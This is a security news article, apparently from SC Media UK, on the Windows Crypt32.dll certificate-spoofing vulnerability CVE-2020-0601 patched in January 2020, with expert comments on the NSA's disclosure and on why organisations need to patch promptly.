It is now confirmed that Microsoft's patch Tuesday yesterday includes a critical spoofing vulnerability in the CryptoAPI DLL (Crypt32.dll) - CVE-2020-0601 - as reported in SC Media UK (see original story below). The vulnerability exists in the way the DLL validates Elliptic Curve Cryptography (ECC) certificates.
In an email to SC Media UK Allan Liska, senior solutions architect at Recorded Future comments: "While it was initially reported that this was solely a Windows 10 vulnerability, the vulnerability exists in both Windows 10 and Windows Server 2016 and 2019. This vulnerability could allow an attacker to spoof the certificates used to sign Windows applications. This in turn would allow malicious software to run even in environments that are heavily controlled and use application whitelisting for added layers of security.
Liska also describes reports that the vulnerability was reported by the NSA to Microsoft as, ".... a good demonstration of the role the NSA, and other security agencies, can play in improving global information security. This reporting is also likely a direct result of the revamped Vulnerability Equities Process (VEP) at NSA. The goal of the revamped programme is to prioritise public interest in reporting security flaws and protecting core systems and infrastructure. Certificate signing is critical to the trust of software applications in both the public and private sectors, so this reporting certainly meets the "critical" threshold. It is worth noting that, at this time, we do not know how long the NSA has knowledge of this vulnerability."
Microsoft fixed 50 vulnerabilities in this first Patch Tuesday of 2020.
Praise for the NSA's actions also came from Chris Morales, head of security analytics at Vectra who adds: "Kudos to the NSA for informing Microsoft and to Microsoft for quickly reacting.
"I’d be interested to understand what makes this exploit worth reporting to Microsoft instead of keeping for their personal arsenal as they have in the past. It could be because many of those previous tools leaked and have caused widespread damage across multiple organisations. It could be because there was a concern other would find this vulnerability themselves and it was dangerous enough to warrant remediation instead of weaponising. Or it just could be the NSA already has enough other methods for compromising a Windows system and doesn’t need it."
Defenders are reminded again of the importance of patching this vulnerability, and how to prioritse, with Tim Mackey, principal security strategist within the Synopsys CyRC (Cybersecurity Research Center) saying: "There are times when it’s reasonable to defer a patch, but deferring the patch for CVE-2020-0601 isn’t one of them. ... Exploitation of this vulnerability will allow an attacker to bypass the trust of all network connections on Windows 10 and Windows Server 2016/2019 systems, or those referencing them.
"With the attention CVE-2020-0601 is receiving, attackers will be crafting their attacks with an eye to profiting from those who lag in their patch procedures. Priority should be placed on patching any Windows device connected to the internet, or fulfilling a network service function like DNS, web proxy, VPN server, domain controllers or systems validating trust. As with any vulnerability, if the system is used by a privilege user, then timely application of patches is critical. In the case of CVE-2020-0601, priority should be placed on patching any system used by a privileged user or by a user with access to sensitive data."
Jonathan Knudsen, senior security strategist at Synopsys, adds a warning saying: "Legitimate developers can cryptographically sign their software, which proves its legitimacy to users at installation time. The vulnerability in crypt32.dll, a fundamental component of Windows, enables an attacker to supply malware that appears to be legitimate. This means that users can unwittingly install bad software even when they are relying on the code signing mechanism to give them assurance of its safety. If you don’t update, attackers are able to exploit these vulnerabilities to steal information or take control of your systems. Many organisations are reluctant to update as soon as patches are available because of the risk of losing functionality. Each organisation must find the line that balances the risk of breakage against the risk of attackers exploiting a vulnerability."
Original story below:
According to numerous sources, the upcoming Microsoft Windows patch should be applied immediately to fix an as-yet unconfirmed but serious vulnerability.
Veteran researcher Brian Krebs posted a blog outlining some of the rumours, focussing on a flaw in ‘a core cryptographic component present in all versions of Windows.’ According to Krebs' sources, the vulnerability concerns a Windows component known as crypt32.dll, a Windows module that Microsoft says handles "certificate and cryptographic messaging functions in the CryptoAPI."
This component includes functionality for encrypting and decrypting data using digital certificates, which if compromised could have serious ramifications for authentication on Windows desktops and servers, sensitiva data handled by Explorer/Edge browsers, and a host of associated applications and services.
Security researcher Will Dormann responded to the rumours with a tweet suggesting that "people should perhaps pay very close attention" to the upcoming patch, a sentiment echoed by Professor Alan Woodward in a later tweet.
I get the impression that people should perhaps pay very close attention to installing tomorrow's Microsoft Patch Tuesday updates in a timely manner. Even more so than others.— Will Dormann (@wdormann) 13 January 2020
I don't know... just call it a hunch?
Pay attention to Patch Tuesday from Microsoft today. This is not going to be one to defer. Don’t panic, just patch.— Alan Woodward (@ProfWoodward) January 14, 2020
Javvad Mallik, security awareness advocate at KnowBe4 further echoed the ‘don’t panic, just patch’ mantra, commenting to SC Media UK: "All software regularly has vulnerabilities and other issues discovered, which is why vendors release patches on a frequent basis to address these. Microsoft is no different in that regard.
However, with the large footprint Microsoft has, any major issues can impact organisations of all sizes across all verticals. The upcoming patch is rumoured to be addressing a major vulnerability. It's important therefore for organisations to prioritise the patch and ensure their systems are protected as soon as possible.
Ultimately, this should be treated like any other patch, prioritised and applied in accordance with its severity. There is no need to panic, just follow standard procedures and patch."
David Kennefick, product architect at edgescan also advocated perspective, while emphasising the importance of updating patching policies: "There is little known about the first windows patch of 2020, other than twitter folks are saying we should pay attention to it. This is not uncommon, and the uncertainty is making people jump to the conclusion that this is another Shellshock (CVE-2014-6271) or Heartbleed (CVE-2014-0160).
"It is very likely not, but the hype that it is attracting is good, it makes organisations realise the importance of patching and ask the question as to the status of their current patching policies.
If this vulnerability is as bad as speculated, there should be an immediate revision of patching policies to make sure the organisation is covered as soon as possible", he concluded.